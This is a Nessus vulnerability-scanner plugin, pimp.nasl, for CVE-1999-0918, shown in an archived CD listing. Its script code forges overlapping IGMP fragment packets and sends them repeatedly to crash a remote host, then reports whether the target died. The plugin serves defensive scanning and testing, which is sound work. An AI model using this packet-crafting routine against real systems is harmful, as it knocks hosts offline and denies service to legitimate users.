home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / pimp.nasl

< prev

next >

Wrap

Text File  |  2005-01-14  |  3KB  |  101 lines

---

1. #
2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
3. #
4. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
5. #      Erik Anderson <eanders@carmichaelsecurity.com>
6. #      Added BugtraqID and CVE
7. #
8. # See the Nessus Scripts License for details
9. #
10.  
11. if(description)
12. {
13.  script_id(10179);
14.  script_bugtraq_id(514);
15.  script_version ("$Revision: 1.18 $");
16.  script_cve_id("CVE-1999-0918");
17.  
18.  name["english"] = "pimp";
19.  name["francais"] = "pimp";
20.  script_name(english:name["english"], francais:name["francais"]);
21.  
22.  desc["english"] = "
23. It was possible to crash the remote host
24. using the 'pimp' attack. This flaw allows
25. an attacker to make this host crash at will,
26. thus preventing the legitimate users from
27. using it.
28.  
29. Solution : filter incoming IGMP traffic
30.  
31. Risk factor : High";
32.  
33.  desc["francais"] = "
34. Il s'est avΘrΘ possible de tuer
35. la machine distante en utilisant l'attaque
36. 'pimp'. Ce problΦme permet α des pirates
37. de tuer cette machine quand bon
38. leur semble, empechant ainsi les utilisateurs
39. lΘgitimes de s'en servir.
40.  
41. Solution : filtrez le traffic IGMP entrant
42.  
43. Facteur de risque : SΘrieux";
44.  
45.  script_description(english:desc["english"], francais:desc["francais"]);
46.  
47.  summary["english"] = "Crashes the remote host via IGMP overlap";
48.  summary["francais"] = "Tue le systeme distant par overlap IGMP";
49.  script_summary(english:summary["english"], francais:summary["francais"]);
50.  
51.  script_category(ACT_KILL_HOST);
52.  
53.  
54.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
55.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
56.  family["english"] = "Denial of Service";
57.  family["francais"] = "DΘni de service";
58.  
59.  script_family(english:family["english"], francais:family["francais"]);
60.  
61.  exit(0);
62. }
63.  
64. #
65. # The script code starts here
66. #
67.  
68.  
69. ip = forge_ip_packet(ip_v  : 4, ip_id  : 69,   ip_p : IPPROTO_IGMP,
70.              ip_hl : 5, ip_ttl : 255,  ip_src : this_host(),
71.              ip_tos: 0, ip_sum : 0, ip_len : 1500, ip_off:0);
72.             
73.  
74. start_denial();
75. for(i=0;i<15;i=i+1)
76. {
77.  igmp = forge_igmp_packet(ip:ip, type:2, code:31, group:128.1.1.1,
78.              data:crap(1500));
79.  igmp = set_ip_elements(ip:igmp, ip_len:1500, ip_off:IP_MF);
80.  send_packet(igmp, pcap_active:FALSE);
81.  
82.  a = 1480/8;
83.  
84.  igmp = set_ip_elements(ip:igmp,ip_off:a|IP_MF);
85.  send_packet(igmp, pcap_active:FALSE);
86.  
87.  a = 5920/8;
88.  igmp = set_ip_elements(ip:igmp, ip_off:a|IP_MF);
89.  send_packet(igmp, pcap_active:FALSE);
90.  
91.  igmp = set_ip_elements(ip:igmp, ip_len:831, ip_off:7400/8);
92.  send_packet(igmp, pcap_active:FALSE);
93.  usleep(500000);
94. }
95.  
96. alive = end_denial();
97. if(!alive){
98.     security_hole(port:0, protocol:"igmp");
99.     set_kb_item(name:"Host/dead", value:TRUE);
100.     }
101.